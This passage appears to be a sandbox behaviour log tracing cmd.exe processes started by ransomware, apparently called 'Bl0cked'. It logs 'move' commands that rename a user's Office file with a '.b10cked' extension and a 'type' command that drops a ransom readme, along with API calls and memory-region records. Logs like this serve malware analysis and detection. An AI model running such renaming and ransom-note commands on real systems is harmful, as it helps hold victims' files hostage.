[0162.437] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" [0162.437] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" [0162.437] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.437] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.437] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.437] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.437] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.438] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.438] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.438] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.438] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.438] GetEnvironmentStringsW () returned 0x362360* [0162.438] FreeEnvironmentStringsW (penv=0x362360) returned 1 [0162.438] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.438] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.438] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.438] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0162.438] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.438] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.438] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.438] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.438] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.438] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4a0, lpFilePart=0x1cf49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf49c*="Desktop") returned 0x18 [0162.439] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.440] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.440] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.440] 
GetEnvironmentStringsW () returned 0x360210* [0162.440] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.440] GetConsoleOutputCP () returned 0x1b5 [0162.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.441] GetUserDefaultLCID () returned 0x409 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="1") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, 
cchData=8 | out: lpLCData=".") returned 2 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.442] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.443] GetConsoleTitleW (in: lpConsoleTitle=0x350930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.443] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.444] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.444] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.444] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.444] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.444] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.444] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.444] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.448] GetConsoleTitleW (in: lpConsoleTitle=0x1cf2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.562] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.562] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.562] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.562] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.562] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.563] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.563] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.564] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf094, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf08c, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf08c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.566] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.566] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0162.566] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0162.566] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelo~1.trx")) returned 0x2020 [0162.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.567] SetErrorMode (uMode=0x1) returned 0x0 [0162.567] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x1cea1c, lpFilePart=0x1cea04 | 
out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", lpFilePart=0x1cea04*="ENVELO~1.TRX") returned 0x3c [0162.567] SetErrorMode (uMode=0x0) returned 0x1 [0162.567] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2010 [0162.567] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0162.567] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0162.567] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelo~1.trx")) returned 0x2020 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.567] SetErrorMode (uMode=0x1) returned 0x0 [0162.567] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x1cee98, lpFilePart=0x1cec30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", lpFilePart=0x1cec30*="ENVELO~1.TRX") returned 0x3c [0162.567] SetErrorMode (uMode=0x0) returned 0x1 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.568] SetErrorMode (uMode=0x1) returned 0x0 [0162.568] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf0a0, lpFilePart=0x1cec30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x1cec30*="ENVELOPR.DLL.trx_dll.b10cked") returned 0x4c [0162.568] SetErrorMode (uMode=0x0) returned 0x1 [0162.568] SetLastError (dwErrCode=0x0) [0162.568] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll.b10cked")) returned 0xffffffff [0162.568] 
GetLastError () returned 0x2 [0162.568] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ce5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce5ac) returned 0x362130 [0162.568] FindNextFileW (in: hFindFile=0x362130, lpFindFileData=0x1ce5ac | out: lpFindFileData=0x1ce5ac) returned 0 [0162.569] GetLastError () returned 0x12 [0162.569] FindClose (in: hFindFile=0x362130 | out: hFindFile=0x362130) returned 1 [0162.570] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x361cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361cc0) returned 0x362130 [0162.570] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ce844, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0162.570] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ce844, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0162.570] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll")) returned 0x2020 [0162.571] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.571] FindClose (in: hFindFile=0x362130 | out: hFindFile=0x362130) returned 1 [0162.571] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ce7f8 | out: _Buffer=" 1") returned 9 [0162.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.571] GetFileType (hFile=0x7) returned 0x2 [0162.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.572] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ce784 | out: lpMode=0x1ce784) returned 1 [0162.572] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ce7b8 | out: lpConsoleScreenBufferInfo=0x1ce7b8) returned 1 [0162.572] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.573] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce7f8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.573] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ce7dc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce7dc*=0x1a) returned 1 [0162.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.573] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.573] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.573] SetConsoleInputExeNameW () returned 0x1 [0162.574] GetConsoleOutputCP () returned 0x1b5 [0162.574] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.574] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.574] exit (_Code=0) Process: id = "279" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22341 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22342 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22343 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22344 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22345 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22346 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22347 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22348 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22349 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 22350 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22476 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22477 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22478 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 22479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file 
name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type 